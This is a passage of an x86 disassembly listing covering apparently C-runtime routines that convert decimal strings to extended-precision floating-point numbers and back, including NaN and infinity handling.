jnz short loc_412455
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_412A6F
; ---------------------------------------------------------------------------
loc_412455: ; CODE XREF: sub_4123ED+47�j
mov edx, [ebp+arg_8]
mov [ebp+var_54], edx
loc_41245B: ; CODE XREF: sub_4123ED+81�j
mov al, [edx]
cmp al, 20h
jz short loc_41246D
cmp al, 9
jz short loc_41246D
cmp al, 0Ah
jz short loc_41246D
cmp al, 0Dh
jnz short loc_412470
loc_41246D: ; CODE XREF: sub_4123ED+72�j
; sub_4123ED+76�j ...
inc edx
jmp short loc_41245B
; ---------------------------------------------------------------------------
loc_412470: ; CODE XREF: sub_4123ED+7E�j
mov bl, 30h
loc_412472: ; CODE XREF: sub_4123ED+A6�j
; sub_4123ED+BC�j ...
mov al, [edx]
inc edx
cmp ecx, 0Bh ; switch 12 cases
ja loc_4126AD ; default
; jumptable 0041247E case 10
jmp off_412A81[ecx*4] ; switch jump
loc_412485: ; DATA XREF: .kSjx934:off_412A81�o
mov cl, al ; jumptable 0041247E case 0
sub cl, 31h
cmp cl, 8
ja short loc_412495
loc_41248F: ; CODE XREF: sub_4123ED+F7�j
; sub_4123ED+14A�j
push 3
loc_412491: ; CODE XREF: sub_4123ED+201�j
; sub_4123ED+218�j
pop ecx
dec edx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_412495: ; CODE XREF: sub_4123ED+A0�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124AB
loc_4124A6: ; CODE XREF: sub_4123ED+15F�j
push 5
loc_4124A8: ; CODE XREF: sub_4123ED+10C�j
; sub_4123ED+138�j ...
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124AB: ; CODE XREF: sub_4123ED+B7�j
movsx eax, al
sub eax, 2Bh
jz short loc_4124D0
dec eax
dec eax
jz short loc_4124C4
sub eax, 3
jnz loc_41264B
loc_4124C0: ; CODE XREF: sub_4123ED+118�j
; sub_4123ED+167�j
mov ecx, esi
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124C4: ; CODE XREF: sub_4123ED+C8�j
push 2
pop ecx
mov [ebp+var_74], 8000h
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D0: ; CODE XREF: sub_4123ED+C4�j
and [ebp+var_74], 0
push 2
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D9: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
mov cl, al ; jumptable 0041247E case 1
sub cl, 31h
cmp cl, 8
mov [ebp+var_58], esi
jbe short loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124FB
loc_4124F7: ; CODE XREF: sub_4123ED+1A7�j
push 4
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_4124FB: ; CODE XREF: sub_4123ED+108�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
cmp al, bl
jz short loc_4124C0
loc_412507: ; CODE XREF: sub_4123ED+1B5�j
cmp al, 43h
jle loc_41264B
cmp al, 45h
jle short loc_412523
cmp al, 63h
jle loc_41264B
cmp al, 65h
jg loc_41264B
loc_412523: ; CODE XREF: sub_4123ED+124�j
push 6
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_412527: ; CODE XREF: sub_4123ED+110�j
; sub_4123ED+114�j ...
dec edx
push 0Bh
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_41252F: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
mov cl, al ; jumptable 0041247E case 2
sub cl, 31h
cmp cl, 8
jbe loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124A6
cmp al, bl
jz loc_4124C0
loc_41255A: ; CODE XREF: sub_4123ED+1F9�j
; sub_4123ED:loc_412619�j
mov edx, [ebp+var_54]
jmp loc_412676
; ---------------------------------------------------------------------------
loc_412562: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
mov [ebp+var_58], esi ; jumptable 0041247E case 3
jmp short loc_412581
; ---------------------------------------------------------------------------
loc_412567: ; CODE XREF: sub_4123ED+196�j
cmp al, 39h
jg short loc_412585
cmp [ebp+var_4C], 19h
jnb short loc_41257B
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
jmp short loc_41257E
; ---------------------------------------------------------------------------
loc_41257B: ; CODE XREF: sub_4123ED+182�j
inc [ebp+var_50]
loc_41257E: ; CODE XREF: sub_4123ED+18C�j
mov al, [edx]
inc edx
loc_412581: ; CODE XREF: sub_4123ED+178�j
cmp al, bl
jge short loc_412567
loc_412585: ; CODE XREF: sub_4123ED+17C�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124F7
loc_41259A: ; CODE XREF: sub_4123ED+1D6�j
; sub_4123ED+1F0�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
jmp loc_412507
; ---------------------------------------------------------------------------
loc_4125A7: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
cmp [ebp+var_4C], 0 ; jumptable 0041247E case 4
mov [ebp+var_58], esi
mov [ebp+var_5C], esi
jnz short loc_4125D9
jmp short loc_4125BB
; ---------------------------------------------------------------------------
loc_4125B5: ; CODE XREF: sub_4123ED+1D0�j
dec [ebp+var_50]
mov al, [edx]
inc edx
loc_4125BB: ; CODE XREF: sub_4123ED+1C6�j
cmp al, bl
jz short loc_4125B5
jmp short loc_4125D9
; ---------------------------------------------------------------------------
loc_4125C1: ; CODE XREF: sub_4123ED+1EE�j
cmp al, 39h
jg short loc_41259A
cmp [ebp+var_4C], 19h
jnb short loc_4125D6
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
dec [ebp+var_50]
loc_4125D6: ; CODE XREF: sub_4123ED+1DC�j
mov al, [edx]
inc edx
loc_4125D9: ; CODE XREF: sub_4123ED+1C4�j
; sub_4123ED+1D2�j
cmp al, bl
jge short loc_4125C1
jmp short loc_41259A
; ---------------------------------------------------------------------------
loc_4125DF: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
sub al, bl ; jumptable 0041247E case 5
cmp al, 9
mov [ebp+var_5C], esi
ja loc_41255A
push 4
jmp loc_412491
; ---------------------------------------------------------------------------
loc_4125F3: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
lea ecx, [edx-2] ; jumptable 0041247E case 6
mov [ebp+var_54], ecx
mov cl, al
sub cl, 31h
cmp cl, 8
ja short loc_41260A
loc_412603: ; CODE XREF: sub_4123ED+25C�j
; sub_4123ED+269�j
push 9
jmp loc_412491
; ---------------------------------------------------------------------------
loc_41260A: ; CODE XREF: sub_4123ED+214�j
movsx eax, al
sub eax, 2Bh
jz short loc_412632
dec eax
dec eax
jz short loc_412626
sub eax, 3
loc_412619: ; CODE XREF: sub_4123ED+26D�j
jnz loc_41255A
push 8
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412626: ; CODE XREF: sub_4123ED+227�j
; sub_4123ED+285�j
or [ebp+var_68], 0FFFFFFFFh
push 7
pop ecx
jmp loc_412472
; ---------------------------------------------------------------------------
loc_412632: ; CODE XREF: sub_4123ED+223�j
; sub_4123ED+281�j
push 7
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412639: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 8
jmp short loc_412641
; ---------------------------------------------------------------------------
loc_41263E: ; CODE XREF: sub_4123ED+256�j
mov al, [edx]
inc edx
loc_412641: ; CODE XREF: sub_4123ED+24F�j
cmp al, bl
jz short loc_41263E
sub al, 31h
cmp al, 8
jbe short loc_412603
loc_41264B: ; CODE XREF: sub_4123ED+CD�j
; sub_4123ED+11C�j ...
dec edx
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_41264E: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
mov cl, al ; jumptable 0041247E case 7
sub cl, 31h
cmp cl, 8
jbe short loc_412603
cmp al, bl
jmp short loc_412619
; ---------------------------------------------------------------------------
loc_41265C: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
cmp [ebp+arg_18], 0 ; jumptable 0041247E case 11
jz short loc_4126A9
movsx eax, al
sub eax, 2Bh
lea ecx, [edx-1]
mov [ebp+var_54], ecx
jz short loc_412632
dec eax
dec eax
jz short loc_412626
mov edx, ecx
loc_412676: ; CODE XREF: sub_4123ED+170�j
; sub_4123ED+25F�j ...
cmp [ebp+var_58], 0
mov eax, [ebp+var_70]
mov [eax], edx
jz loc_412A2A
push 18h
pop eax
cmp [ebp+var_4C], eax
jbe short loc_41269D
cmp [ebp+var_9], 5
jl short loc_412696
inc [ebp+var_9]
loc_412696: ; CODE XREF: sub_4123ED+2A4�j
dec edi
inc [ebp+var_50]
mov [ebp+var_4C], eax
loc_41269D: ; CODE XREF: sub_4123ED+29E�j
cmp [ebp+var_4C], 0
jbe loc_412A51
jmp short loc_412702
; ---------------------------------------------------------------------------
loc_4126A9: ; CODE XREF: sub_4123ED+273�j
push 0Ah
pop ecx
dec edx
loc_4126AD: ; CODE XREF: sub_4123ED+8B�j
; sub_4123ED+91�j
; DATA XREF: ...
cmp ecx, 0Ah ; default
; jumptable 0041247E case 10
jnz loc_412472
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .kSjx934:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 9
xor ecx, ecx
jmp short loc_4126D8
; ---------------------------------------------------------------------------
loc_4126BF: ; CODE XREF: sub_4123ED+2ED�j
cmp al, 39h
jg short loc_4126E3
imul ecx, 0Ah
movsx esi, al
lea ecx, [ecx+esi-30h]
cmp ecx, 1450h
jg short loc_4126DE
mov al, [edx]
inc edx
loc_4126D8: ; CODE XREF: sub_4123ED+2D0�j
cmp al, bl
jge short loc_4126BF
jmp short loc_4126E3
; ---------------------------------------------------------------------------
loc_4126DE: ; CODE XREF: sub_4123ED+2E6�j
mov ecx, 1451h
loc_4126E3: ; CODE XREF: sub_4123ED+2D4�j
; sub_4123ED+2EF�j
mov [ebp+var_64], ecx
jmp short loc_4126F3
; ---------------------------------------------------------------------------
loc_4126E8: ; CODE XREF: sub_4123ED+308�j
cmp al, 39h
jg loc_41264B
mov al, [edx]
inc edx
loc_4126F3: ; CODE XREF: sub_4123ED+2F9�j
cmp al, bl
jge short loc_4126E8
jmp loc_41264B
; ---------------------------------------------------------------------------
loc_4126FC: ; CODE XREF: sub_4123ED+319�j
dec [ebp+var_4C]
inc [ebp+var_50]
loc_412702: ; CODE XREF: sub_4123ED+2BA�j
dec edi
cmp byte ptr [edi], 0
jz short loc_4126FC
lea eax, [ebp+var_3C]
push eax
push [ebp+var_4C]
lea eax, [ebp+var_20]
push eax
call sub_4137AA
mov eax, [ebp+var_64]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_68], ecx
jge short loc_412727
neg eax
loc_412727: ; CODE XREF: sub_4123ED+336�j
add eax, [ebp+var_50]
cmp [ebp+var_60], ecx
jnz short loc_412732
add eax, [ebp+arg_10]
loc_412732: ; CODE XREF: sub_4123ED+340�j
cmp [ebp+var_5C], ecx
jnz short loc_41273A
sub eax, [ebp+arg_14]
loc_41273A: ; CODE XREF: sub_4123ED+348�j
cmp eax, 1450h
jg loc_412A33
cmp eax, 0FFFFEBB0h
jl loc_412A4A
mov esi, offset dword_424260
sub esi, 60h
cmp eax, ecx
mov [ebp+var_54], eax
jz loc_412A18
jge short loc_412772
neg eax
mov esi, offset dword_4243C0
mov [ebp+var_54], eax
sub esi, 60h
loc_412772: ; CODE XREF: sub_4123ED+376�j
cmp [ebp+arg_C], ecx
jnz short loc_41277B
mov word ptr [ebp+var_3C], cx
loc_41277B: ; CODE XREF: sub_4123ED+388�j
cmp [ebp+var_54], ecx
jz loc_412A18
loc_412784: ; CODE XREF: sub_4123ED+625�j
mov eax, [ebp+var_54]
sar [ebp+var_54], 3
add esi, 54h
and eax, 7
test eax, eax
mov [ebp+var_4C], esi
jz loc_412A0E
imul eax, 0Ch
add eax, esi
mov ebx, eax
cmp word ptr [ebx], 8000h
mov [ebp+var_70], ebx
jb short loc_4127C1
mov esi, ebx
lea edi, [ebp+var_48]
movsd
movsd
movsd
dec [ebp+var_46]
mov esi, [ebp+var_4C]
lea ebx, [ebp+var_48]
mov [ebp+var_70], ebx
loc_4127C1: ; CODE XREF: sub_4123ED+3BE�j
movzx edx, word ptr [ebx+0Ah]
mov ecx, [ebp+var_32]
xor eax, eax
mov [ebp+var_50], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov eax, edx
mov edi, 7FFFh
xor eax, ecx
and ecx, edi
and edx, edi
and eax, 8000h
cmp cx, 7FFFh
lea edi, [edx+ecx]
movzx edi, di
jnb loc_4129F4
cmp dx, 7FFFh
jnb loc_4129F4
cmp di, 0BFFDh
ja loc_4129F4
cmp di, 3FBFh
ja short loc_412823
xor eax, eax
mov [ebp+var_38], eax
mov [ebp+var_3C], eax
jmp loc_412A0B
; ---------------------------------------------------------------------------
loc_412823: ; CODE XREF: sub_4123ED+427�j
test cx, cx
jnz short loc_412847
inc edi
test dword ptr [ebp-34h], 7FFFFFFFh
jnz short loc_412847
cmp [ebp+var_38], 0
jnz short loc_412847
cmp [ebp+var_3C], 0
jnz short loc_412847
and word ptr [ebp+var_32], cx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_412847: ; CODE XREF: sub_4123ED+439�j
; sub_4123ED+443�j ...
xor ecx, ecx
cmp dx, cx
jnz short loc_41286F
inc edi
test dword ptr [ebx+8], 7FFFFFFFh
jnz short loc_41286F
cmp [ebx+4], ecx
jnz short loc_41286F
cmp [ebx], ecx
jnz short loc_41286F
mov [ebp-34h], ecx
mov [ebp+var_38], ecx
mov [ebp+var_3C], ecx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_41286F: ; CODE XREF: sub_4123ED+45F�j
; sub_4123ED+469�j ...
and [ebp+var_68], ecx
lea esi, [ebp+var_28]
mov [ebp+var_58], 5
loc_41287C: ; CODE XREF: sub_4123ED+4FF�j
mov ecx, [ebp+var_68]
mov edx, [ebp+var_58]
add ecx, ecx
test edx, edx
mov [ebp+var_64], edx
jle short loc_4128E0
lea ecx, [ebp+ecx+var_3C]
add ebx, 8
mov [ebp+var_5C], ecx
mov [ebp+var_60], ebx
loc_412898: ; CODE XREF: sub_4123ED+4EE�j
mov ecx, [ebp+var_60]
mov edx, [ebp+var_5C]
movzx edx, word ptr [edx]
movzx ecx, word ptr [ecx]
and [ebp+var_78], 0
imul ecx, edx
mov edx, [esi-4]
lea ebx, [edx+ecx]
cmp ebx, edx
jb short loc_4128B9
cmp ebx, ecx
jnb short loc_4128C0
loc_4128B9: ; CODE XREF: sub_4123ED+4C6�j
mov [ebp+var_78], 1
loc_4128C0: ; CODE XREF: sub_4123ED+4CA�j
cmp [ebp+var_78], 0
mov [esi-4], ebx
jz short loc_4128CC
inc word ptr [esi]
loc_4128CC: ; CODE XREF: sub_4123ED+4DA�j
add [ebp+var_5C], 2
sub [ebp+var_60], 2
dec [ebp+var_64]
cmp [ebp+var_64], 0
jg short loc_412898
mov ebx, [ebp+var_70]
loc_4128E0: ; CODE XREF: sub_4123ED+49C�j
inc esi
inc esi
inc [ebp+var_68]
dec [ebp+var_58]
cmp [ebp+var_58], 0
jg short loc_41287C
add edi, 0C002h
test di, di
jle short loc_412934
loc_4128F9: ; CODE XREF: sub_4123ED+540�j
test [ebp+var_24], 80000000h
jnz short loc_41292F
mov esi, [ebp+var_28]
mov ecx, [ebp+var_2C]
shl [ebp+var_2C], 1
shr ecx, 1Fh
mov edx, esi
add esi, esi
or esi, ecx
mov ecx, [ebp+var_24]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
add edi, 0FFFFh
test di, di
mov [ebp+var_28], esi
mov [ebp+var_24], ecx
jg short loc_4128F9
loc_41292F: ; CODE XREF: sub_4123ED+513�j
test di, di
jg short loc_412982
loc_412934: ; CODE XREF: sub_4123ED+50A�j
add edi, 0FFFFh
test di, di
jge short loc_412982
mov ecx, edi
neg ecx
movzx esi, cx
add edi, esi
loc_412948: ; CODE XREF: sub_4123ED+588�j
test byte ptr [ebp+var_2C], 1
jz short loc_412951
inc [ebp+var_50]
loc_412951: ; CODE XREF: sub_4123ED+55F�j
mov ecx, [ebp+var_24]
mov ebx, [ebp+var_28]
mov edx, [ebp+var_28]
shr [ebp+var_24], 1
shl ecx, 1Fh
shr ebx, 1
or ebx, ecx
mov ecx, [ebp+var_2C]
shl edx, 1Fh
shr ecx, 1
or ecx, edx
dec esi
mov [ebp+var_28], ebx
mov [ebp+var_2C], ecx
jnz short loc_412948
cmp [ebp+var_50], 0
jz short loc_412982
or word ptr [ebp+var_2C], 1
loc_412982: ; CODE XREF: sub_4123ED+545�j
; sub_4123ED+550�j ...
cmp word ptr [ebp+var_2C], 8000h
ja short loc_41299B
mov ecx, [ebp+var_2C]
and ecx, 1FFFFh
cmp ecx, 18000h
jnz short loc_4129CE
loc_41299B: ; CODE XREF: sub_4123ED+59B�j
cmp [ebp+var_2C+2], 0FFFFFFFFh
jnz short loc_4129CB
and [ebp+var_2C+2], 0
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_4129C6
and [ebp+var_28+2], 0
cmp word ptr [ebp+var_24+2], 0FFFFh
jnz short loc_4129C0
mov word ptr [ebp+var_24+2], 8000h
inc edi
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C0: ; CODE XREF: sub_4123ED+5C8�j
inc word ptr [ebp+var_24+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C6: ; CODE XREF: sub_4123ED+5BC�j
inc [ebp+var_28+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129CB: ; CODE XREF: sub_4123ED+5B2�j
inc [ebp+var_2C+2]
loc_4129CE: ; CODE XREF: sub_4123ED+5AC�j
; sub_4123ED+5D1�j ...
cmp di, 7FFFh
mov esi, [ebp+var_4C]
jnb short loc_4129F4
mov cx, word ptr [ebp+var_2C+2]
mov word ptr [ebp+var_3C], cx
mov ecx, [ebp+var_28]
mov [ebp+var_3C+2], ecx
mov ecx, [ebp+var_24]
or edi, eax
mov [ebp+var_38+2], ecx
mov word ptr [ebp+var_32], di
jmp short loc_412A0E
; ---------------------------------------------------------------------------
loc_4129F4: ; CODE XREF: sub_4123ED+406�j
; sub_4123ED+411�j ...
neg ax
sbb eax, eax
and [ebp+var_38], 0
and eax, 80000000h
add eax, 7FFF8000h
and [ebp+var_3C], 0
loc_412A0B: ; CODE XREF: sub_4123ED+431�j
mov [ebp-34h], eax
loc_412A0E: ; CODE XREF: sub_4123ED+3A9�j
; sub_4123ED+455�j ...
cmp [ebp+var_54], 0
jnz loc_412784
loc_412A18: ; CODE XREF: sub_4123ED+370�j
; sub_4123ED+391�j
mov eax, [ebp-34h]
movzx ecx, word ptr [ebp+var_3C]
mov esi, [ebp+var_3C+2]
mov edx, [ebp+var_38+2]
shr eax, 10h
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A2A: ; CODE XREF: sub_4123ED+292�j
mov [ebp+var_6C], 4
jmp short loc_412A51
; ---------------------------------------------------------------------------
loc_412A33: ; CODE XREF: sub_4123ED+352�j
xor esi, esi
mov eax, 7FFFh
mov edx, 80000000h
xor ecx, ecx
mov [ebp+var_6C], 2
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A4A: ; CODE XREF: sub_4123ED+35D�j
mov [ebp+var_6C], 1
loc_412A51: ; CODE XREF: sub_4123ED+2B4�j
; sub_4123ED+644�j
xor ecx, ecx
xor eax, eax
xor edx, edx
xor esi, esi
loc_412A59: ; CODE XREF: sub_4123ED+63B�j
; sub_4123ED+65B�j
mov edi, [ebp+var_7C]
or eax, [ebp+var_74]
mov [edi], cx
mov [edi+0Ah], ax
mov eax, [ebp+var_6C]
mov [edi+2], esi
mov [edi+6], edx
loc_412A6F: ; CODE XREF: sub_4123ED+63�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4123ED endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_412A81 dd offset loc_412485 ; DATA XREF: sub_4123ED+91�r
dd offset loc_4124D9 ; jump table for switch statement
dd offset loc_41252F
dd offset loc_412562
dd offset loc_4125A7
dd offset loc_4125DF
dd offset loc_4125F3
dd offset loc_41264E
dd offset loc_412639
dd offset loc_4126B8
dd offset loc_4126AD
dd offset loc_41265C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412AB1 proc near ; CODE XREF: sub_411771+3F�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1A = dword ptr -1Ah
var_16 = dword ptr -16h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 74h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
lea esi, [ebp+arg_0]
lea edi, [ebp+var_10]
movsd
movsd
movsw
mov edx, [ebp+var_8]
mov ecx, edx
mov eax, 8000h
and ecx, eax
and edx, 7FFFh
test cx, cx
mov [ebp+var_60], ebx
mov byte ptr [ebp+var_30], 0CCh
mov byte ptr [ebp+var_30+1], 0CCh
mov byte ptr [ebp+var_30+2], 0CCh
mov byte ptr [ebp+var_30+3], 0CCh
mov byte ptr [ebp+var_2C], 0CCh
mov byte ptr [ebp+var_2C+1], 0CCh
mov byte ptr [ebp+var_2C+2], 0CCh
mov byte ptr [ebp+var_2C+3], 0CCh
mov byte ptr [ebp+var_28], 0CCh
mov byte ptr [ebp+var_28+1], 0CCh
mov byte ptr [ebp+var_28+2], 0FBh
mov byte ptr [ebp+var_28+3], 3Fh
mov [ebp+var_74], 1
mov [ebp+var_6C], ecx
jz short loc_412B2B
mov byte ptr [ebx+2], 2Dh
jmp short loc_412B2F
; ---------------------------------------------------------------------------
loc_412B2B: ; CODE XREF: sub_412AB1+72�j
mov byte ptr [ebx+2], 20h
loc_412B2F: ; CODE XREF: sub_412AB1+78�j
test dx, dx
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jnz short loc_412B68
test esi, esi
jnz short loc_412B68
test edi, edi
jnz short loc_412B68
and [ebx], di
cmp cx, ax
setnz al
dec al
and al, 0Dh
add al, 20h
mov [ebx+2], al
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
mov byte ptr [ebx+5], 0
loc_412B60: ; CODE XREF: sub_412AB1+6FB�j
; sub_412AB1+8C3�j
xor eax, eax
inc eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412B68: ; CODE XREF: sub_412AB1+87�j
; sub_412AB1+8B�j ...
cmp dx, 7FFFh
jnz loc_412C11
mov eax, 80000000h
cmp esi, eax
mov word ptr [ebx], 1
jnz short loc_412B85
test edi, edi
jz short loc_412B94
loc_412B85: ; CODE XREF: sub_412AB1+CE�j
test esi, 40000000h
jnz short loc_412B94
push offset a1Snan ; "1#SNAN"
jmp short loc_412BE5
; ---------------------------------------------------------------------------
loc_412B94: ; CODE XREF: sub_412AB1+D2�j
; sub_412AB1+DA�j
test cx, cx
jz short loc_412BAC
cmp esi, 0C0000000h
jnz short loc_412BAC
test edi, edi
jnz short loc_412BE0
push offset a1Ind ; "1#IND"
jmp short loc_412BB9
; ---------------------------------------------------------------------------
loc_412BAC: ; CODE XREF: sub_412AB1+E6�j
; sub_412AB1+EE�j
cmp esi, eax
jnz short loc_412BE0
test edi, edi
jnz short loc_412BE0
push offset a1Inf ; "1#INF"
loc_412BB9: ; CODE XREF: sub_412AB1+F9�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412BDA
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412BDA: ; CODE XREF: sub_412AB1+11A�j
mov byte ptr [ebx+3], 5
jmp short loc_412C0A
; ---------------------------------------------------------------------------
loc_412BE0: ; CODE XREF: sub_412AB1+F2�j
; sub_412AB1+FD�j ...
push offset a1Qnan ; "1#QNAN"
loc_412BE5: ; CODE XREF: sub_412AB1+E1�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412C06: ; CODE XREF: sub_412AB1+146�j
mov byte ptr [ebx+3], 6
loc_412C0A: ; CODE XREF: sub_412AB1+12D�j
xor eax, eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412C11: ; CODE XREF: sub_412AB1+BC�j
movzx ecx, dx
mov ebx, ecx
imul ecx, 4D10h
shr ebx, 8
mov eax, esi
shr eax, 18h
lea eax, [ebx+eax*2]
imul eax, 4Dh
lea eax, [eax+ecx-134312F4h]
sar eax, 10h
movzx ecx, ax
movsx ebx, cx
mov [ebp+var_4C], ecx
xor eax, eax
mov ecx, offset dword_424260
neg ebx
sub ecx, 60h
cmp ebx, eax
mov word ptr [ebp+var_16], dx
mov [ebp+var_1A], esi
mov [ebp+var_20+2], edi
mov word ptr [ebp+var_20], ax
mov [ebp+var_68], ecx
jz loc_412F10
jge short loc_412C71
mov ecx, offset dword_4243C0
neg ebx
sub ecx, 60h
mov [ebp+var_68], ecx
loc_412C71: ; CODE XREF: sub_412AB1+1B1�j
cmp ebx, eax
jz loc_412F10
loc_412C79: ; CODE XREF: sub_412AB1+457�j
add [ebp+var_68], 54h
mov ecx, ebx
and ecx, 7
sar ebx, 3
test ecx, ecx
jz loc_412F06
imul ecx, 0Ch
add ecx, [ebp+var_68]
cmp word ptr [ecx], 8000h
mov [ebp+var_64], ecx
jb short loc_412CB0
mov esi, ecx
lea edi, [ebp+var_3C]
movsd
movsd
lea eax, [ebp+var_3C]
movsd
dec [ebp+var_3C+2]
mov [ebp+var_64], eax
mov ecx, eax
loc_412CB0: ; CODE XREF: sub_412AB1+1EA�j
movzx edi, word ptr [ecx+0Ah]
mov edx, [ebp+var_16]
xor eax, eax
mov ecx, edi
mov esi, 7FFFh
xor ecx, edx
and edx, esi
and edi, esi
mov [ebp+var_48], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
and ecx, 8000h
cmp dx, si
lea eax, [edi+edx]
movzx eax, ax
jnb loc_412EEA
cmp di, si
jnb loc_412EEA
cmp ax, 0BFFDh
ja loc_412EEA
cmp ax, 3FBFh
ja short loc_412D10
xor eax, eax
mov [ebp+var_1A+2], eax
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D10: ; CODE XREF: sub_412AB1+24D�j
xor esi, esi
cmp dx, si
jnz short loc_412D34
inc eax
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412D34
cmp [ebp-1Ch], esi
jnz short loc_412D34
cmp [ebp+var_20], esi
jnz short loc_412D34
mov word ptr [ebp+var_16], si
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D34: ; CODE XREF: sub_412AB1+264�j
; sub_412AB1+26E�j ...
cmp di, si
jnz short loc_412D5D
mov edx, [ebp+var_64]
inc eax
test dword ptr [edx+8], 7FFFFFFFh
jnz short loc_412D5D
cmp [edx+4], esi
jnz short loc_412D5D
cmp [edx], esi
jnz short loc_412D5D
mov [ebp+var_1A+2], esi
mov [ebp-1Ch], esi
mov [ebp+var_20], esi
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D5D: ; CODE XREF: sub_412AB1+286�j
; sub_412AB1+293�j ...
lea edi, [ebp+var_C]
mov [ebp+var_5C], esi
mov [ebp+var_44], edi
mov [ebp+var_40], 5
loc_412D6D: ; CODE XREF: sub_412AB1+332�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_412DD4
lea edx, [ebp+edx+var_20]
mov [ebp+var_58], edx
mov edx, [ebp+var_64]
add edx, 8
mov [ebp+var_54], edx
loc_412D8C: ; CODE XREF: sub_412AB1+321�j
mov edx, [ebp+var_58]
mov esi, [ebp+var_54]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
